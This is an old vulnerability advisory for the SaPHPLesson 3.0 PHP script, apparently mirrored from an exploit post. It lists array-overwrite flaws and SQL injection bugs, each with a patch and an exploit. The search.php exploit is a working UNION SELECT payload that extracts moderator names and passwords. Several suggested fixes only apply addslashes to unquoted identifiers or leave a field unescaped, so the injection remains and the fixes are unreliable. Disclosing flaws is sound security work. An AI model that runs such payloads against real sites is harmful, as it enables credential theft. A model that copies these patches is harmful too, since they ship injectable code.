SaPHPLesson 3.0 Multbugs

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053246 漏洞类型
发布时间 2006-05-10 更新时间 2006-05-10
CVE编号 CVE-2006-2279
CVE-2006-2278
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050059
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:

1- Unfilter array

Filename	:- show.php

Line		:- 102

[code]

$hrow[] = $Row2;[/code]

Fix :-

Add To Line [ 11 ] /show.php This Code :-

we add the code to global to fix all unfilter ver. at the code :)

[code]

$hrow = array();[/code]

Exploit :-

GET ^

/lessons/show.php?lessid=1&hrow=D3vil-0x1

/---------------------------------------------------------/

2- Unfilter array

Filename	:- showcat.php

Line		:- 80

[code]

$Lsnrow[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /showcat.php This Code :-

we add the code to global to fix all unfilter ver. at the code :)

[code]

$Lsnrow = array();[/code]

Exploit :-

GET ^

/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1

/---------------------------------------------------------/

3- SQL Injection

Filename	:- search.php

Line		:- MultLines

Fix :-

Line 28 Replace It With

[code]

$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

Line 32 Replace It With

[code]

$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

Exploit :-

POST ^

Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,nu
ll,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC

/---------------------------------------------------------/

4- SQL Injection

Filename	:- misc.php

Line		:- 64

Fix :-

Replace Line 62 & 63 With This Code

[code]

$LID  = intval($_GET["LID"]);

$Rate = intval($_POST["Rate"]);[/code]

/---------------------------------------------------------/

5- Unfilter array

Filename	:- index.php

Line		:- 24

[code]

$rows[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /index.php This Code :-

we add the code to global to fix all unfilter ver. at the code :)

[code]

$rows = array();

$hrow = array();[/code]

Exploit :-

GET ^

/saphplesson/index.php?rows=D3vil-x01